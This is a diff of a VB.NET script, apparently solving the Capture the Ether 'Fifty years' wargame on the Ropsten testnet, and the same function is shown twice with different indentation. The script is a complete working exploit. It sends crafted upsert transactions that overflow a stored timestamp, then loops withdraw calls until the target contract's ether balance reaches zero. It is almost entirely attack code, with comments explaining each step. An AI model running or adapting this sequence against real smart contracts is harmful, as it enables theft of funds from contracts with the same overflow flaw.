Enigmatic331 · September 2, 2018 06:13
diff --git a/CTE_fiftyyears_exploitsequence.vb b/CTE_fiftyyears_exploitsequence.vb
    Private Async Sub testContract()
        Dim privateKey As New Nethereum.Signer.EthECKey("<enterprivatekeyhere>")
        Dim account = New Nethereum.Web3.Accounts.Account(privateKey)


        ' ABI and bytecode of the deployed contract
        Dim abi = "[{""constant"":false,""inputs"":[{""name"":""index"",""type"":""uint256""}],""name"":""withdraw"",""outputs"":[],""payable"":false,""stateMutability"":""nonpayable"",""type"":""function""},{""constant"":false,""inputs"":[{""name"":""index"",""type"":""uint256""},{""name"":""timestamp"",""type"":""uint256""}],""name"":""upsert"",""outputs"":[],""payable"":true,""stateMutability"":""payable"",""type"":""function""},{""constant"":true,""inputs"":[],""name"":""isComplete"",""outputs"":[{""name"":"""",""type"":""bool""}],""payable"":false,""stateMutability"":""view"",""type"":""function""},{""inputs"":[{""name"":""player"",""type"":""address""}],""payable"":true,""stateMutability"":""payable"",""type"":""constructor""}]"
        Dim iweb3 = New Web3(account, "https://ropsten.infura.io/")

        ' contract address - Get contract
        Dim tokenContractAddress = "0x4723B3521e0f62F48527C3E1C022F95bd1223E52"
        Dim tokencontract = iweb3.Eth.GetContract(abi, tokenContractAddress)

        Dim gas As New HexBigInteger(100000)
        Dim value As New HexBigInteger(0)
        Dim gasPrice As New HexBigInteger(5000000000)
        Dim maxUIntMinusOneDay As BigInteger = BigInteger.Parse("115792089237316195423570985008687907853269984665640564039457584007913129553536")
        Dim setZero As UInt32 = 0
        Dim set86400 As UInt32 = 86400
        Dim sentValue As UInt32

        Dim upsert = tokencontract.GetFunction("upsert")
        Dim transactionHash As Object

        'first upsert - 1,115792089237316195423570985008687907853269984665640564039457584007913129553536
        'send one wei, prepare to overflow timestamp
        value = New HexBigInteger(1) '1 wei
        sentValue = value.Value
        transactionHash = Await upsert.SendTransactionAndWaitForReceiptAsync(account.Address, gas, gasPrice, value, , sentValue, maxUIntMinusOneDay)

        'second upset - 2,0
        'send two wei
        value = New HexBigInteger(2)
        sentValue = value.Value
        transactionHash = Await upsert.SendTransactionAndWaitForReceiptAsync(account.Address, gas, gasPrice, value, , sentValue, setZero)

        'third upsert
        value = New HexBigInteger(3)
        sentValue = value.Value
        transactionHash = Await upsert.SendTransactionAndWaitForReceiptAsync(account.Address, gas, gasPrice, value, , sentValue, set86400)

        'fourth upsert
        'prepare to overflow timestamp again
        value = New HexBigInteger(4)
        sentValue = value.Value
        transactionHash = Await upsert.SendTransactionAndWaitForReceiptAsync(account.Address, gas, gasPrice, value, , sentValue, maxUIntMinusOneDay)

        'fifth upsert
        'send 5 wei, set timestamp to 0, which sets head to zero, then we can withdraw bulk of the eth held by the contact
        value = New HexBigInteger(5)
        sentValue = value.Value
        transactionHash = Await upsert.SendTransactionAndWaitForReceiptAsync(account.Address, gas, gasPrice, value, , sentValue, setZero)

        Dim withdraw = tokencontract.GetFunction("withdraw")
        sentValue = 3
        value = New HexBigInteger(0)
        'withdraw on index 3
        transactionHash = Await withdraw.SendTransactionAndWaitForReceiptAsync(account.Address, gas, gasPrice, value,  , sentValue)

        'now we no longer need to send ether with our transactions
        'check how much balance is left, and loop accordingly (balance - 1)
        Dim balance = Await iweb3.Eth.GetBalance.SendRequestAsync(tokenContractAddress)
        Dim i As Integer = 0
        value = New HexBigInteger(0)
        sentValue = value.Value

        While i < balance.Value
            ' prepare to overflow timestamp, overflow so it expires, then withdraw 1 wei. Repeat till empty.
            value = New HexBigInteger(0)
            sentValue = value.Value
            Await upsert.SendTransactionAndWaitForReceiptAsync(account.Address, gas, gasPrice, New HexBigInteger(0), , 0, maxUIntMinusOneDay)
            Await upsert.SendTransactionAndWaitForReceiptAsync(account.Address, gas, gasPrice, New HexBigInteger(0), , 0, setZero)
            Await withdraw.SendTransactionAndWaitForReceiptAsync(account.Address, gas, gasPrice, value, , sentValue)
            i += 1
        End While


        balance = Await iweb3.Eth.GetBalance.SendRequestAsync(tokenContractAddress)
        If balance.Value = 0 Then
            Debug.Print("Finally!")
        End If
    End Sub
	Private Async Sub testContract()
	Dim privateKey As New Nethereum.Signer.EthECKey("<enterprivatekeyhere>")
	Dim account = New Nethereum.Web3.Accounts.Account(privateKey)


	' ABI and bytecode of the deployed contract
	Dim abi = "[{""constant"":false,""inputs"":[{""name"":""index"",""type"":""uint256""}],""name"":""withdraw"",""outputs"":[],""payable"":false,""stateMutability"":""nonpayable"",""type"":""function""},{""constant"":false,""inputs"":[{""name"":""index"",""type"":""uint256""},{""name"":""timestamp"",""type"":""uint256""}],""name"":""upsert"",""outputs"":[],""payable"":true,""stateMutability"":""payable"",""type"":""function""},{""constant"":true,""inputs"":[],""name"":""isComplete"",""outputs"":[{""name"":"""",""type"":""bool""}],""payable"":false,""stateMutability"":""view"",""type"":""function""},{""inputs"":[{""name"":""player"",""type"":""address""}],""payable"":true,""stateMutability"":""payable"",""type"":""constructor""}]"
	Dim iweb3 = New Web3(account, "https://ropsten.infura.io/")

	' contract address - Get contract
	Dim tokenContractAddress = "0x4723B3521e0f62F48527C3E1C022F95bd1223E52"
	Dim tokencontract = iweb3.Eth.GetContract(abi, tokenContractAddress)

	Dim gas As New HexBigInteger(100000)
	Dim value As New HexBigInteger(0)
	Dim gasPrice As New HexBigInteger(5000000000)
	Dim maxUIntMinusOneDay As BigInteger = BigInteger.Parse("115792089237316195423570985008687907853269984665640564039457584007913129553536")
	Dim setZero As UInt32 = 0
	Dim set86400 As UInt32 = 86400
	Dim sentValue As UInt32

	Dim upsert = tokencontract.GetFunction("upsert")
	Dim transactionHash As Object

	'first upsert - 1,115792089237316195423570985008687907853269984665640564039457584007913129553536
	'send one wei, prepare to overflow timestamp
	value = New HexBigInteger(1) '1 wei
	sentValue = value.Value
	transactionHash = Await upsert.SendTransactionAndWaitForReceiptAsync(account.Address, gas, gasPrice, value, , sentValue, maxUIntMinusOneDay)

	'second upset - 2,0
	'send two wei
	value = New HexBigInteger(2)
	sentValue = value.Value
	transactionHash = Await upsert.SendTransactionAndWaitForReceiptAsync(account.Address, gas, gasPrice, value, , sentValue, setZero)

	'third upsert
	value = New HexBigInteger(3)
	sentValue = value.Value
	transactionHash = Await upsert.SendTransactionAndWaitForReceiptAsync(account.Address, gas, gasPrice, value, , sentValue, set86400)

	'fourth upsert
	'prepare to overflow timestamp again
	value = New HexBigInteger(4)
	sentValue = value.Value
	transactionHash = Await upsert.SendTransactionAndWaitForReceiptAsync(account.Address, gas, gasPrice, value, , sentValue, maxUIntMinusOneDay)

	'fifth upsert
	'send 5 wei, set timestamp to 0, which sets head to zero, then we can withdraw bulk of the eth held by the contact
	value = New HexBigInteger(5)
	sentValue = value.Value
	transactionHash = Await upsert.SendTransactionAndWaitForReceiptAsync(account.Address, gas, gasPrice, value, , sentValue, setZero)

	Dim withdraw = tokencontract.GetFunction("withdraw")
	sentValue = 3
	value = New HexBigInteger(0)
	'withdraw on index 3
	transactionHash = Await withdraw.SendTransactionAndWaitForReceiptAsync(account.Address, gas, gasPrice, value, , sentValue)

	'now we no longer need to send ether with our transactions
	'check how much balance is left, and loop accordingly (balance - 1)
	Dim balance = Await iweb3.Eth.GetBalance.SendRequestAsync(tokenContractAddress)
	Dim i As Integer = 0
	value = New HexBigInteger(0)
	sentValue = value.Value

	While i < balance.Value
	' prepare to overflow timestamp, overflow so it expires, then withdraw 1 wei. Repeat till empty.
	value = New HexBigInteger(0)
	sentValue = value.Value
	Await upsert.SendTransactionAndWaitForReceiptAsync(account.Address, gas, gasPrice, New HexBigInteger(0), , 0, maxUIntMinusOneDay)
	Await upsert.SendTransactionAndWaitForReceiptAsync(account.Address, gas, gasPrice, New HexBigInteger(0), , 0, setZero)
	Await withdraw.SendTransactionAndWaitForReceiptAsync(account.Address, gas, gasPrice, value, , sentValue)
	i += 1
	End While


	balance = Await iweb3.Eth.GetBalance.SendRequestAsync(tokenContractAddress)
	If balance.Value = 0 Then
	Debug.Print("Finally!")
	End If
	End Sub